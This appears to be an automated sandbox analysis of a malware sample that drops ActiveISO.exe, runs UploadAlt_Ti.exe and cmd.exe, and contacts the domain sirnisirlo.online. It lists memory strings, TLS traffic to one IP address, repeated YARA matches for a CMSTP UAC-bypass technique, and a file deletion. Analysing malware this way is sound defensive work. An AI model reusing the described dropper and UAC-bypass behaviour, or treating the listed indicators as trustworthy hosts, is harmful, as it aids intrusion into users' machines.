Source: ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 00000004.00000002.1532542754.00007FFBA88AA000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.phreedom.org/md5)
Source: ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 00000004.00000002.1532542754.00007FFBA88AA000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.phreedom.org/md5)08:27
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
Source: UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.surfok.de/
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: UploadAlt_Ti.exe, 00000009.00000003.1972989413.0000000000583000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2005933569.0000000000583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sirnisirlo.online/
Source: UploadAlt_Ti.exe, 00000009.00000003.1972989413.0000000000583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sirnisirlo.online/R
Source: UploadAlt_Ti.exe, 00000009.00000003.1857270455.0000000000583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sirnisirlo.online/Z
Source: UploadAlt_Ti.exe, 00000009.00000003.1988875965.0000000000512000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1988875965.0000000000542000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1843864307.0000000000533000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2017301615.0000000007C03000.00000004.00001000.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1857413936.0000000000512000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2005933569.0000000000542000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1955444803.0000000000542000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sirnisirlo.online/heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6G
Source: UploadAlt_Ti.exe, 00000009.00000003.1895332607.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sirnisirlo.online:443
Source: UploadAlt_Ti.exe, 00000009.00000003.1843864307.0000000000533000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sirnisirlo.online:443/heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2Fvxzk
Source: UploadAlt_Ti.exe, 00000009.00000003.1973982779.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sirnisirlo.online:443W
Source: UploadAlt_Ti.exe, 00000009.00000002.2018894272.00000000083C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: ActiveISO.exe, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.lsoft.net/act/
Source: ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.lsoft.net/act/1DeRegister()2released()Deactivation
Source: ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.lsoft.net/act/We
Source: UploadAlt_Ti.exe, 00000009.00000002.2018894272.00000000083C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.thawte.com/cps0/
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 58029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58018
Source: unknown	Network traffic detected: HTTP traffic on port 58014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58017
Source: unknown	Network traffic detected: HTTP traffic on port 58016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58027
Source: unknown	Network traffic detected: HTTP traffic on port 58020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58026
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58022
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58029
Source: unknown	Network traffic detected: HTTP traffic on port 58015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58009
Source: unknown	Network traffic detected: HTTP traffic on port 58018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58014
Source: unknown	Network traffic detected: HTTP traffic on port 58017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58011
Source: unknown	Network traffic detected: HTTP traffic on port 58023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58027 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58023 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:58029 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.UploadAlt_Ti.exe.26cc6ed.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.UploadAlt_Ti.exe.275f6ed.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.cmd.exe.4d8cacd.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.cmd.exe.56cfacd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.4d5e6cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.4d5dacd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.UploadAlt_Ti.exe.2719a20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.cmd.exe.4d18a00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.cmd.exe.36707f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.UploadAlt_Ti.exe.275eaed.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.UploadAlt_Ti.exe.26cbaed.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.UploadAlt_Ti.exe.2686a20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.cmd.exe.4d8d6cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.cmd.exe.4d47a00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.cmd.exe.568aa00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.cmd.exe.56d06cd.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A924050 ?setAttribute@QCoreApplication@@SAXW4ApplicationAttribute@Qt@@_N@Z,??0QApplication@@QEAA@AEAHPEAPEADH@Z,?applicationDirPath@QCoreApplication@@SA?AVQString@@XZ,?toNativeSeparators@QDir@@SA?AVQString@@AEBV2@@Z,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromLocal8Bit@QString@@SA?AV1@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,??0QChar@@QEAA@UQLatin1Char@@@Z,?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?toUpper@QString@@QEGBA?AV1@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEB		3_2_00007FF72A924050
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4134050 ?setAttribute@QCoreApplication@@SAXW4ApplicationAttribute@Qt@@_N@Z,??0QApplication@@QEAA@AEAHPEAPEADH@Z,?applicationDirPath@QCoreApplication@@SA?AVQString@@XZ,?toNativeSeparators@QDir@@SA?AVQString@@AEBV2@@Z,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromLocal8Bit@QString@@SA?AV1@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,??0QChar@@QEAA@UQLatin1Char@@@Z,?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?toUpper@QString@@QEGBA?AV1@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEB		4_2_00007FF7F4134050

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

File deleted: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe

Jump to behavior

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004F001D	0_2_004F001D
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004E41EA	0_2_004E41EA
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004C62AA	0_2_004C62AA
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004EC332	0_2_004EC332
